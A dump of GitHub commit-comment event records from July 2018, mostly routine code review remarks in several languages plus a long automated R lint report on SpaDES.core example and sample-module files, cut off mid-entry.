{"id":"7984917217","type":"CommitCommentEvent","actor":{"login":"robbyoung"},"repo":{"name":"robbyoung/HabbajetAngular"},"payload":{"comment":{"id":29754702,"position":null,"line":null,"path":null,"commit_id":"a15cc8b4a451b5e038854869c15af0b474e9e7f6","created_at":"2018-07-18T19:11:48Z","updated_at":"2018-07-18T19:11:48Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Add Strings.xml to build script](https://trello.com/c/imWpW71R/42-add-stringsxml-to-build-script)"}},"created_at":"2018-07-18T19:11:48Z"}
{"id":"7984917885","type":"CommitCommentEvent","actor":{"login":"cmpich"},"repo":{"name":"alliance-genome/agr_loader"},"payload":{"comment":{"id":29754703,"position":162,"line":102,"path":"src/extractors/obo_ext.py","commit_id":"21645dbe270ccc18bc0177ed0d0a3bf18ee30a50","created_at":"2018-07-18T19:11:56Z","updated_at":"2018-07-18T19:11:56Z","author_association":"CONTRIBUTOR","body":"Why is this commented out? Can that be deleted?"}},"created_at":"2018-07-18T19:11:56Z"}
{"id":"7984922463","type":"CommitCommentEvent","actor":{"login":"ViktoriyaRyazhska"},"repo":{"name":"ViktoriyaRyazhska/Lv-329.JavaCore"},"payload":{"comment":{"id":29754715,"position":20,"line":20,"path":"Homework5/MainL5Ex2.java","commit_id":"b7e2b1e179ff966933e49fad42aca61120abec3d","created_at":"2018-07-18T19:12:54Z","updated_at":"2018-07-18T19:12:54Z","author_association":"OWNER","body":"ці перевірки добре було би робити в циклі"}},"created_at":"2018-07-18T19:12:54Z"}
{"id":"7984926760","type":"CommitCommentEvent","actor":{"login":"cmpich"},"repo":{"name":"alliance-genome/agr_loader"},"payload":{"comment":{"id":29754725,"position":27,"line":24,"path":"src/loaders/go_loader.py","commit_id":"21645dbe270ccc18bc0177ed0d0a3bf18ee30a50","created_at":"2018-07-18T19:13:48Z","updated_at":"2018-07-18T19:13:48Z","author_association":"CONTRIBUTOR","body":"What is 'isas' used for?"}},"created_at":"2018-07-18T19:13:48Z"}
{"id":"7984932113","type":"CommitCommentEvent","actor":{"login":"ViktoriyaRyazhska"},"repo":{"name":"ViktoriyaRyazhska/Lv-329.JavaCore"},"payload":{"comment":{"id":29754735,"position":59,"line":59,"path":"Homework5/MainL5Ex3.java","commit_id":"b7e2b1e179ff966933e49fad42aca61120abec3d","created_at":"2018-07-18T19:14:55Z","updated_at":"2018-07-18T19:14:55Z","author_association":"OWNER","body":"ми можем цей if перенести у попередній цикл і відразу коли вводимо дані їх аналізуємо і обчислюємо добуток. Будемо мати на один цикл менше"}},"created_at":"2018-07-18T19:14:55Z"}
{"id":"7984934405","type":"CommitCommentEvent","actor":{"login":"danthegoodman1"},"repo":{"name":"danthegoodman1/esp8266-blynk-localstorage-wifimanager"},"payload":{"comment":{"id":29754742,"position":null,"line":null,"path":null,"commit_id":"ebc43ae74fd83061c16348fbd75af2e3e5eac319","created_at":"2018-07-18T19:15:25Z","updated_at":"2018-07-18T19:15:25Z","author_association":"OWNER","body":"Added battery checking and reporting to battery level in app"}},"created_at":"2018-07-18T19:15:25Z"}
{"id":"7984936525","type":"CommitCommentEvent","actor":{"login":"windsorsean"},"repo":{"name":"windsorsean/nissan-leaf-ps"},"payload":{"comment":{"id":29754748,"position":null,"line":null,"path":null,"commit_id":"b32002ae3b80dc5d64e95fbc984e1fc590a639a9","created_at":"2018-07-18T19:15:51Z","updated_at":"2018-07-18T19:15:51Z","author_association":"OWNER","body":"Updates:\r\n- Change code to use functions\r\n- Location; object returned has a Location property with an object instead of lat/long properties."}},"created_at":"2018-07-18T19:15:51Z"}
{"id":"7984939262","type":"CommitCommentEvent","actor":{"login":"KentJames"},"repo":{"name":"nithyanandan/EPIC"},"payload":{"comment":{"id":29754754,"position":null,"line":null,"path":null,"commit_id":"26ece00054952e44837043125590263504ccb0e0","created_at":"2018-07-18T19:16:26Z","updated_at":"2018-07-18T19:16:26Z","author_association":"COLLABORATOR","body":"This is great. It looks like you've gotten the finer points worked out better than I could have done. One thing I notice is that the whole thing stutters on the GPU correlator step, and it's because of the pipelining of data from the system memory to the GPU memory.\r\n\r\nThe cuBLAS operation under the cover is blisteringly fast(I can run 64 channels and it doesn't get any slower, so looks like a data transfer issue), it seems to be just synchronising enough data across isn't very fast at all. Is there any reccomendations as to how we get around this? \r\n\r\nFrom experience doing a huge gulp of data would just make the problem worse, as cuBLAS batches very efficiently, and then you have even more data to transfer back and forth. "}},"created_at":"2018-07-18T19:16:26Z"}
{"id":"7984944301","type":"CommitCommentEvent","actor":{"login":"Planeshifter"},"repo":{"name":"Planeshifter/isle-editor"},"payload":{"comment":{"id":29754763,"position":15,"line":326,"path":"app/components/data-table/index.js","commit_id":"1e6ec44b3e89cba67b6ba29ae511db67fa533a94","created_at":"2018-07-18T19:17:32Z","updated_at":"2018-07-18T19:17:32Z","author_association":"OWNER","body":"Any specific reason why you chose an enclosing div? It's fine, but alternatively you could have also added another class to the button itself."}},"created_at":"2018-07-18T19:17:32Z"}
{"id":"7984948444","type":"CommitCommentEvent","actor":{"login":"ViktoriyaRyazhska"},"repo":{"name":"ViktoriyaRyazhska/Lv-329.JavaCore"},"payload":{"comment":{"id":29754772,"position":17,"line":17,"path":"week_three/les6/EX2HW/App.java","commit_id":"b1e02c1355ffdfb23d0ddb8ca59ed401d51ea11d","created_at":"2018-07-18T19:18:26Z","updated_at":"2018-07-18T19:18:26Z","author_association":"OWNER","body":"якщо на клас Employee буде імплементити інтерфейс calculatePay, то не потрібно буде тут приведення типів"}},"created_at":"2018-07-18T19:18:26Z"}
{"id":"7984950185","type":"CommitCommentEvent","actor":{"login":"p51i"},"repo":{"name":"UI-Research/next50"},"payload":{"comment":{"id":29754773,"position":null,"line":null,"path":null,"commit_id":"a4dde51f45e8747a2a88b41bb6a6a5a31de1b235","created_at":"2018-07-18T19:18:50Z","updated_at":"2018-07-18T19:18:50Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [next50#ci-89](https://dashboard.pantheon.io/sites/8e7c33cd-c6bd-4dcf-a71d-f1ade4f2e791#ci-89).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-89-next50.pantheonsite.io/)"}},"created_at":"2018-07-18T19:18:50Z"}
{"id":"7984950981","type":"CommitCommentEvent","actor":{"login":"alifr"},"repo":{"name":"NCIOCPL/wcms-front-end"},"payload":{"comment":{"id":29754774,"position":16,"line":317,"path":"CancerGov/_src/StyleSheets/_homelanding.scss","commit_id":"675f0f9d346afa3a8a2044bd52459835c9341938","created_at":"2018-07-18T19:19:00Z","updated_at":"2018-07-18T19:19:00Z","author_association":"MEMBER","body":"You should remove the tablet-ls media query. It's redundant."}},"created_at":"2018-07-18T19:19:00Z"}
{"id":"7984955117","type":"CommitCommentEvent","actor":{"login":"Planeshifter"},"repo":{"name":"Planeshifter/isle-editor"},"payload":{"comment":{"id":29754781,"position":29,"line":549,"path":"app/components/markdown-editor/index.js","commit_id":"340a5ce3a31b66386873ee6a02e516bd8d00f46d","created_at":"2018-07-18T19:19:53Z","updated_at":"2018-07-18T19:19:53Z","author_association":"OWNER","body":"The page sizing option has only relevance to the PDF output, so I don't think we should have it in the main toolbar. Or what was the rationale?"}},"created_at":"2018-07-18T19:19:53Z"}
{"id":"7984955965","type":"CommitCommentEvent","actor":{"login":"emanoelvianna"},"repo":{"name":"ccem-dev/otus"},"payload":{"comment":{"id":29754783,"position":13,"line":28,"path":"otus/app/module/laboratory/business/participant/aliquot/aliquot-messages-service.js","commit_id":"7c090d5b7be5720e702f8d1420cf7edfa58017e0","created_at":"2018-07-18T19:20:04Z","updated_at":"2018-07-18T19:20:04Z","author_association":"MEMBER","body":"Isto deve ser um _alert_ como: \r\n\r\n`alert = $mdDialog.alert({`\r\n\r\nCaso contrario irá aparecer uma sombra onde deveria existir um segundo botão da confirmação."}},"created_at":"2018-07-18T19:20:04Z"}
{"id":"7984956064","type":"CommitCommentEvent","actor":{"login":"padmassun"},"repo":{"name":"NREL/openstudio-standards"},"payload":{"comment":{"id":29754784,"position":null,"line":null,"path":null,"commit_id":"15e6568504885abd72ce57f7af1bab1b37cdcbc5","created_at":"2018-07-18T19:20:05Z","updated_at":"2018-07-18T19:20:05Z","author_association":"MEMBER","body":"https://github.com/canmet-energy/btap_tasks/issues/107"}},"created_at":"2018-07-18T19:20:05Z"}
{"id":"7984956307","type":"CommitCommentEvent","actor":{"login":"padmassun"},"repo":{"name":"NREL/openstudio-standards"},"payload":{"comment":{"id":29754785,"position":null,"line":null,"path":null,"commit_id":"ce5b6ca79331b3eb17b7087763c17e35f698a5a3","created_at":"2018-07-18T19:20:09Z","updated_at":"2018-07-18T19:20:09Z","author_association":"MEMBER","body":"https://github.com/canmet-energy/btap_tasks/issues/107"}},"created_at":"2018-07-18T19:20:09Z"}
{"id":"7984956691","type":"CommitCommentEvent","actor":{"login":"padmassun"},"repo":{"name":"NREL/openstudio-standards"},"payload":{"comment":{"id":29754787,"position":null,"line":null,"path":null,"commit_id":"e6f8e6a20c982e75359ffd0f3ad96671e0dc9c2f","created_at":"2018-07-18T19:20:13Z","updated_at":"2018-07-18T19:20:13Z","author_association":"MEMBER","body":"https://github.com/canmet-energy/btap_tasks/issues/107"}},"created_at":"2018-07-18T19:20:13Z"}
{"id":"7984957331","type":"CommitCommentEvent","actor":{"login":"bodgergely"},"repo":{"name":"rafalmiel/cykusz-rs"},"payload":{"comment":{"id":29754788,"position":null,"line":null,"path":null,"commit_id":"269f596da079f6c88fd25a0b7820a045ace859ef","created_at":"2018-07-18T19:20:20Z","updated_at":"2018-07-18T19:20:20Z","author_association":"NONE","body":"nice!"}},"created_at":"2018-07-18T19:20:20Z"}
{"id":"7984959021","type":"CommitCommentEvent","actor":{"login":"emanoelvianna"},"repo":{"name":"ccem-dev/otus"},"payload":{"comment":{"id":29754792,"position":35,"line":38,"path":"otus/app/module/laboratory/business/participant/aliquot/aliquot-messages-service.js","commit_id":"7c090d5b7be5720e702f8d1420cf7edfa58017e0","created_at":"2018-07-18T19:20:42Z","updated_at":"2018-07-18T19:20:42Z","author_association":"MEMBER","body":"Isto deve ser um _alert_ como: \r\n\r\n`alert = $mdDialog.alert({`\r\n\r\nCaso contrario irá aparecer uma sombra onde deveria existir um segundo botão da confirmação."}},"created_at":"2018-07-18T19:20:42Z"}
{"id":"7984960006","type":"CommitCommentEvent","actor":{"login":"uncle-tom"},"repo":{"name":"kirivaha/WP-test"},"payload":{"comment":{"id":29754795,"position":7,"line":7,"path":"blocks/default/loop-default.php","commit_id":"f99df344e446dba47f690976b5828b43413729eb","created_at":"2018-07-18T19:20:54Z","updated_at":"2018-07-18T19:20:54Z","author_association":"NONE","body":"Тут тоже самое - нам нужно выводить актуальное кол-во комментариев к странице. Сейчас оно статически - 2 коммента у всех записей. "}},"created_at":"2018-07-18T19:20:54Z"}
{"id":"7984960048","type":"CommitCommentEvent","actor":{"login":"shiftrtech"},"repo":{"name":"shiftrtech/mailinblue"},"payload":{"comment":{"id":29754796,"position":null,"line":null,"path":null,"commit_id":"9951d7eca16466357f936baf1c93cb12f99b7342","created_at":"2018-07-18T19:20:54Z","updated_at":"2018-07-18T19:20:54Z","author_association":"OWNER","body":"Created multidev environment [mailinblue#ci-13](https://dashboard.pantheon.io/sites/7c88439c-0f59-4679-be2f-1f02e1043d37#ci-13).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-13-mailinblue.pantheonsite.io/)"}},"created_at":"2018-07-18T19:20:54Z"}
{"id":"7984963080","type":"CommitCommentEvent","actor":{"login":"sacuribraimo"},"repo":{"name":"sacuribraimo/esaude-emr-poc"},"payload":{"comment":{"id":29754803,"position":7,"line":7,"path":"test/e2eTests/pages/socialDashboardPage.js","commit_id":"04e7f6c8642cf2d6809f137b4efe52401f5b77c9","created_at":"2018-07-18T19:21:34Z","updated_at":"2018-07-18T19:21:34Z","author_association":"OWNER","body":"This is OK. It extends Page directly. The problem is on sub-classes of the socialsFormPage.js below."}},"created_at":"2018-07-18T19:21:34Z"}
{"id":"7984963411","type":"CommitCommentEvent","actor":{"login":"taimur-akhtar"},"repo":{"name":"farzam-azhar/pms"},"payload":{"comment":{"id":29754807,"position":4,"line":23,"path":"Gemfile","commit_id":"c2c6b78fa9b3dd1f43a950bebf2810af78788896","created_at":"2018-07-18T19:21:38Z","updated_at":"2018-07-18T19:21:38Z","author_association":"NONE","body":"search for nested_form vs cocoon...and let me know tomorrow which you think is better."}},"created_at":"2018-07-18T19:21:38Z"}
{"id":"7984967392","type":"CommitCommentEvent","actor":{"login":"emanoelvianna"},"repo":{"name":"ccem-dev/otus"},"payload":{"comment":{"id":29754811,"position":53,"line":53,"path":"otus/app/module/laboratory/business/participant/aliquot/aliquot-messages-service.js","commit_id":"7c090d5b7be5720e702f8d1420cf7edfa58017e0","created_at":"2018-07-18T19:22:29Z","updated_at":"2018-07-18T19:22:29Z","author_association":"MEMBER","body":"Minha sugestão é modificar para _cancelar_ no lugar de voltar."}},"created_at":"2018-07-18T19:22:29Z"}
{"id":"7984970265","type":"CommitCommentEvent","actor":{"login":"KentJames"},"repo":{"name":"nithyanandan/EPIC"},"payload":{"comment":{"id":29754817,"position":null,"line":null,"path":null,"commit_id":"26ece00054952e44837043125590263504ccb0e0","created_at":"2018-07-18T19:23:05Z","updated_at":"2018-07-18T19:23:05Z","author_association":"COLLABORATOR","body":"This looks great, definitely better than I could have done.\r\n\r\nIt looks like the cuBLAS operation is pretty efficient, I'm not sure how efficient the data transfer is from system memory -> gpu and back. Running four channels only takes twice as long as one channel, so it looks like the data transfer in the rings is slowing it up slightly.\r\n\r\nIs there any way you can tweak the pipelining in Bifrost to improve this? From experience this is really hard, keeping GPU occupancy high when faced with a high memory bandwidth algorithm like this is non-trivial, and I've not really worked out how to fix that. I imagine Bifrosts architecture does a pretty good job. \r\n\r\n\r\n(Before I hadn't noticed it'd been hard wired to output 1 channel from the F-Engine) "}},"created_at":"2018-07-18T19:23:05Z"}
{"id":"7984973266","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"PredictiveEcology/SpaDES.core"},"payload":{"comment":{"id":29754826,"position":null,"line":null,"path":null,"commit_id":"fdf21a0c5bdc1d7d7ebb513096b56f5d5dbf50ec","created_at":"2018-07-18T19:23:42Z","updated_at":"2018-07-18T19:23:42Z","author_association":"NONE","body":"[inst/examples/example_experiment.R:91:5:](https://github.com/PredictiveEcology/SpaDES.core/blob/fdf21a0c5bdc1d7d7ebb513096b56f5d5dbf50ec/inst/examples/example_experiment.R#L91) *style:* **Commented code should be removed.**\n```r\n​  # library(raster)\n    ^~~~~~~~~~~~~~~\n```\n[inst/examples/example_experiment.R:92:5:](https://github.com/PredictiveEcology/SpaDES.core/blob/fdf21a0c5bdc1d7d7ebb513096b56f5d5dbf50ec/inst/examples/example_experiment.R#L92) *style:* **Commented code should be removed.**\n```r\n​  # beginCluster(20) # if you have multiple clusters available, use them here to save time\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/examples/example_experiment.R:96:5:](https://github.com/PredictiveEcology/SpaDES.core/blob/fdf21a0c5bdc1d7d7ebb513096b56f5d5dbf50ec/inst/examples/example_experiment.R#L96) *style:* **Commented code should be removed.**\n```r\n​  # endCluster() # end the clusters\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/examples/example_experiment.R:152:5:](https://github.com/PredictiveEcology/SpaDES.core/blob/fdf21a0c5bdc1d7d7ebb513096b56f5d5dbf50ec/inst/examples/example_experiment.R#L152) *style:* **Commented code should be removed.**\n```r\n​  # fires <- lapply(sims, function(x) x$landscape$fires) %>% stack\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/examples/example_POM.R:49:5:](https://github.com/PredictiveEcology/SpaDES.core/blob/fdf21a0c5bdc1d7d7ebb513096b56f5d5dbf50ec/inst/examples/example_POM.R#L49) *style:* **Commented code should be removed.**\n```r\n​  # cl <- makeCluster(detectCores() - 1) # not implemented yet in DEoptim\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/examples/example_POM.R:84:4:](https://github.com/PredictiveEcology/SpaDES.core/blob/fdf21a0c5bdc1d7d7ebb513096b56f5d5dbf50ec/inst/examples/example_POM.R#L84) *style:* **Commented code should be removed.**\n```r\n​  #stopCluster(cl) # not yet implemented, waiting for DEoptim\n   ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/examples/example_POM.R:107:34:](https://github.com/PredictiveEcology/SpaDES.core/blob/fdf21a0c5bdc1d7d7ebb513096b56f5d5dbf50ec/inst/examples/example_POM.R#L107) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​    params(sim1)$caribouMovement$N <- pars[2]\n                                 ^\n```\n[inst/examples/example_POM.R:114:5:](https://github.com/PredictiveEcology/SpaDES.core/blob/fdf21a0c5bdc1d7d7ebb513096b56f5d5dbf50ec/inst/examples/example_POM.R#L114) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​    nPattern_Out <- caribouFn(out$caribou)\n    ^~~~~~~~~~~~\n```\n[inst/examples/example_POM.R:120:7:](https://github.com/PredictiveEcology/SpaDES.core/blob/fdf21a0c5bdc1d7d7ebb513096b56f5d5dbf50ec/inst/examples/example_POM.R#L120) *style:* **Commented code should be removed.**\n```r\n​    # cat(minimizeFn)\n      ^~~~~~~~~~~~~~~\n```\n[inst/examples/example_POM.R:121:7:](https://github.com/PredictiveEcology/SpaDES.core/blob/fdf21a0c5bdc1d7d7ebb513096b56f5d5dbf50ec/inst/examples/example_POM.R#L121) *style:* **Commented code should be removed.**\n```r\n​    # cat(\" \")\n      ^~~~~~~~\n```\n[inst/examples/example_POM.R:122:7:](https://github.com/PredictiveEcology/SpaDES.core/blob/fdf21a0c5bdc1d7d7ebb513096b56f5d5dbf50ec/inst/examples/example_POM.R#L122) *style:* **Commented code should be removed.**\n```r\n​    # cat(pars)\n      ^~~~~~~~~\n```\n[inst/examples/example_POM.R:123:7:](https://github.com/PredictiveEcology/SpaDES.core/blob/fdf21a0c5bdc1d7d7ebb513096b56f5d5dbf50ec/inst/examples/example_POM.R#L123) *style:* **Commented code should be removed.**\n```r\n​    # cat(\"\\n\")\n      ^~~~~~~~~\n```\n[inst/sampleModules/caribouMovement/caribouMovement.R:1:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/fdf21a0c5bdc1d7d7ebb513096b56f5d5dbf50ec/inst/sampleModules/caribouMovement/caribouMovement.R#L1) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​SpaDES.core.version <- \"0.1.0\"\n^~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/caribouMovement/caribouMovement.R:54:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/fdf21a0c5bdc1d7d7ebb513096b56f5d5dbf50ec/inst/sampleModules/caribouMovement/caribouMovement.R#L54) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​doEvent.caribouMovement <- function(sim, eventTime, eventType, debug = FALSE) {\n^~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/caribouMovement/caribouMovement.R:86:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/fdf21a0c5bdc1d7d7ebb513096b56f5d5dbf50ec/inst/sampleModules/caribouMovement/caribouMovement.R#L86) *style:* **Lines should not be more than 100 characters.**\n```r\n​      sim <- scheduleEvent(sim, time(sim) + P(sim)$.plotInterval, \"caribouMovement\", \"plot\", .last())\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/caribouMovement/caribouMovement.R:95:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/fdf21a0c5bdc1d7d7ebb513096b56f5d5dbf50ec/inst/sampleModules/caribouMovement/caribouMovement.R#L95) *style:* **Lines should not be more than 100 characters.**\n```r\n​      sim <- scheduleEvent(sim, time(sim) + P(sim)$.plotInterval, \"caribouMovement\", \"plot\", .last())\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/caribouMovement/caribouMovement.R:102:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/fdf21a0c5bdc1d7d7ebb513096b56f5d5dbf50ec/inst/sampleModules/caribouMovement/caribouMovement.R#L102) *style:* **Lines should not be more than 100 characters.**\n```r\n​      sim <- scheduleEvent(sim, time(sim) + P(sim)$.saveInterval, \"caribouMovement\", \"save\", .last() + 1)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/caribouMovement/caribouMovement.R:114:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/fdf21a0c5bdc1d7d7ebb513096b56f5d5dbf50ec/inst/sampleModules/caribouMovement/caribouMovement.R#L114) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​Init <- function(sim) {\n^~~~\n```\n[inst/sampleModules/caribouMovement/caribouMovement.R:121:3:](https://github.com/PredictiveEcology/SpaDES.core/blob/fdf21a0c5bdc1d7d7ebb513096b56f5d5dbf50ec/inst/sampleModules/caribouMovement/caribouMovement.R#L121) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  N <- P(sim)$N\n  ^\n```\n[inst/sampleModules/caribouMovement/caribouMovement.R:122:3:](https://github.com/PredictiveEcology/SpaDES.core/blob/fdf21a0c5bdc1d7d7ebb513096b56f5d5dbf50ec/inst/sampleModules/caribouMovement/caribouMovement.R#L122) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  IDs <- as.character(1:N)\n  ^~~\n```\n[inst/sampleModules/caribouMovement/caribouMovement.R:138:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/fdf21a0c5bdc1d7d7ebb513096b56f5d5dbf50ec/inst/sampleModules/caribouMovement/caribouMovement.R#L138) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​Move <- function(sim) {\n^~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:1:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/fdf21a0c5bdc1d7d7ebb513096b56f5d5dbf50ec/inst/sampleModules/fireSpread/fireSpread.R#L1) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​SpaDES.core.version <- \"0.1.0\"\n^~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:20:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/fdf21a0c5bdc1d7d7ebb513096b56f5d5dbf50ec/inst/sampleModules/fireSpread/fireSpread.R#L20) *style:* **Lines should not be more than 100 characters.**\n```r\n​    person(c(\"Alex\", \"M\"), \"Chubaty\", email = \"alexander.chubaty@canada.ca\", role = c(\"aut\", \"cre\")),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:21:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/fdf21a0c5bdc1d7d7ebb513096b56f5d5dbf50ec/inst/sampleModules/fireSpread/fireSpread.R#L21) *style:* **Lines should not be more than 100 characters.**\n```r\n​    person(c(\"Eliot\", \"J\", \"B\"), \"McIntire\", email = \"eliot.mcintire@canada.ca\", role = c(\"aut\", \"cre\")),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:35:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/fdf21a0c5bdc1d7d7ebb513096b56f5d5dbf50ec/inst/sampleModules/fireSpread/fireSpread.R#L35) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\"persistprob\", \"numeric\", 0.00, 0, 1, \"probability of fire persisting in a pixel\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:37:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/fdf21a0c5bdc1d7d7ebb513096b56f5d5dbf50ec/inst/sampleModules/fireSpread/fireSpread.R#L37) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\"spreadprob\", \"numeric\", 0.225, 0.05, 0.5, \"probability of fire spreading into a pixel\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:38:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/fdf21a0c5bdc1d7d7ebb513096b56f5d5dbf50ec/inst/sampleModules/fireSpread/fireSpread.R#L38) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\"startTime\", \"numeric\", start(sim) + 1, 0, end(sim), \"time of initial fire ignition\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:39:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/fdf21a0c5bdc1d7d7ebb513096b56f5d5dbf50ec/inst/sampleModules/fireSpread/fireSpread.R#L39) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\".plotInitialTime\", \"numeric\", start(sim), start(sim), end(sim) + 1, \"time to schedule first plot event\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:41:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/fdf21a0c5bdc1d7d7ebb513096b56f5d5dbf50ec/inst/sampleModules/fireSpread/fireSpread.R#L41) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\".saveInitialTime\", \"numeric\", NA_real_, NA, NA, \"time to schedule first save event\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:42:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/fdf21a0c5bdc1d7d7ebb513096b56f5d5dbf50ec/inst/sampleModules/fireSpread/fireSpread.R#L42) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\".saveInterval\", \"numeric\", NA_real_, NA, NA, \"time interval between save events\")\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:59:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/fdf21a0c5bdc1d7d7ebb513096b56f5d5dbf50ec/inst/sampleModules/fireSpread/fireSpread.R#L59) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​doEvent.fireSpread <- function(sim, eventTime, eventType, debug = FALSE) {\n^~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:87:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/fdf21a0c5bdc1d7d7ebb513096b56f5d5dbf50ec/inst/sampleModules/fireSpread/fireSpread.R#L87) *style:* **Lines should not be more than 100 characters.**\n```r\n​      sim <- scheduleEvent(sim, time(sim), \"fireSpread\", \"stats\") # do stats immediately following burn\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:142:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/fdf21a0c5bdc1d7d7ebb513096b56f5d5dbf50ec/inst/sampleModules/fireSpread/fireSpread.R#L142) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​Init <- function(sim) {\n^~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:146:3:](https://github.com/PredictiveEcology/SpaDES.core/blob/fdf21a0c5bdc1d7d7ebb513096b56f5d5dbf50ec/inst/sampleModules/fireSpread/fireSpread.R#L146) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  Fires <- raster(extent(landscapes), ncol = ncol(landscapes),\n 